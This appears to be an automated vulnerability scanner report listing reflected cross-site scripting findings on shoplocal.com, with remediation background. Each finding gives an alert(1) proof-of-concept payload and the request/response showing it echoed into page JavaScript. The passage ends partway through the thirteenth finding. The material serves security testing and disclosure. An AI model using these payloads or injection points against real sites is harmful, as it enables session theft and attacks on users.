Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cc96'-alert(1)-'2f1e7ce9f19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9cc96'-alert(1)-'2f1e7ce9f19=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Tue, 20-Nov-2035 17:26:47 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 17:26:47 GMT Connection: close Content-Length: 60064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?9cc96'-alert(1)-'2f1e7ce9f19=1&action=home&viewmode=local&referrer=&random=9032256&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.2. http://www.shoplocal.com/BrowseLocalL2.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/BrowseLocalL2.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b65'-alert(1)-'a5147e6bbc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BrowseLocalL2.aspx?n=14391278&35b65'-alert(1)-'a5147e6bbc7=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:55 GMT Connection: close Content-Length: 168266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?n=14391278&35b65'-alert(1)-'a5147e6bbc7=1&action=BrowseLocalL2&viewmode=local&referrer=&random=1081839865&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.3. http://www.shoplocal.com/air-fresheners.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/air-fresheners.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f9d'-alert(1)-'a458714982d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /air-fresheners.fp?f6f9d'-alert(1)-'a458714982d=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:40 GMT Connection: close Content-Length: 175622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135582&f6f9d'-alert(1)-'a458714982d=1&action=browselocall2&viewmode=local&referrer=&random=1317237343&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.4. http://www.shoplocal.com/baby-food.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/baby-food.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a072b'-alert(1)-'7e07befffbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baby-food.fp?a072b'-alert(1)-'7e07befffbd=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:57 GMT Connection: close Content-Length: 160436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133307&a072b'-alert(1)-'7e07befffbd=1&action=browselocall2&viewmode=local&referrer=&random=393758731&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.5. http://www.shoplocal.com/baked-goods.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/baked-goods.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 890c6'-alert(1)-'66913265408 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baked-goods.fp?890c6'-alert(1)-'66913265408=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:51:26 GMT Connection: close Content-Length: 161109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133308&890c6'-alert(1)-'66913265408=1&action=browselocall2&viewmode=local&referrer=&random=1186279275&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.6. http://www.shoplocal.com/baking-oils-spices.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/baking-oils-spices.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2ba'-alert(1)-'2649aff226f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baking-oils-spices.fp?9f2ba'-alert(1)-'2649aff226f=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:58 GMT Connection: close Content-Length: 177815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133318&9f2ba'-alert(1)-'2649aff226f=1&action=browselocall2&viewmode=local&referrer=&random=1865866157&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.7. http://www.shoplocal.com/beer-wine-tobacco.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/beer-wine-tobacco.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40160'-alert(1)-'48fd220da0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beer-wine-tobacco.fp?40160'-alert(1)-'48fd220da0b=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:01 GMT Connection: close Content-Length: 171515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133314&40160'-alert(1)-'48fd220da0b=1&action=browselocall2&viewmode=local&referrer=&random=541745787&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.8. http://www.shoplocal.com/beer.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/beer.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a646b'-alert(1)-'9aa5623532d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beer.fp?a646b'-alert(1)-'9aa5623532d=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:41 GMT Connection: close Content-Length: 161285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134862&a646b'-alert(1)-'9aa5623532d=1&action=browselocall2&viewmode=local&referrer=&random=112640896&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.9. http://www.shoplocal.com/beverages.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/beverages.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13361'-alert(1)-'9661c8c5f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beverages.fp?13361'-alert(1)-'9661c8c5f4f=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:43 GMT Connection: close Content-Length: 176056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133306&13361'-alert(1)-'9661c8c5f4f=1&action=browselocall2&viewmode=local&referrer=&random=337414356&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.10. http://www.shoplocal.com/black-friday.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/black-friday.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c9cb'-alert(1)-'3d485397a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /black-friday.aspx?6c9cb'-alert(1)-'3d485397a98=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:56 GMT Connection: close Content-Length: 39811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?6c9cb'-alert(1)-'3d485397a98=1&action=black-friday&viewmode=local&referrer=&random=129544967&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.11. http://www.shoplocal.com/bread.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bread.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9efc'-alert(1)-'c04d6fc2437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bread.fp?a9efc'-alert(1)-'c04d6fc2437=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:47 GMT Connection: close Content-Length: 123610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135095&a9efc'-alert(1)-'c04d6fc2437=1&action=browselocall2&viewmode=local&referrer=&random=395534340&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.12. http://www.shoplocal.com/breakfast-bars-pop-tarts.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/breakfast-bars-pop-tarts.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55349'-alert(1)-'b1b95be5b6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /breakfast-bars-pop-tarts.fp?55349'-alert(1)-'b1b95be5b6f=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:44 GMT Connection: close Content-Length: 152641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134861&55349'-alert(1)-'b1b95be5b6f=1&action=browselocall2&viewmode=local&referrer=&random=895686738&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.13. http://www.shoplocal.com/breakfast-cereal.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/breakfast-cereal.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c83cf'-alert(1)-'f9ff5feeef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
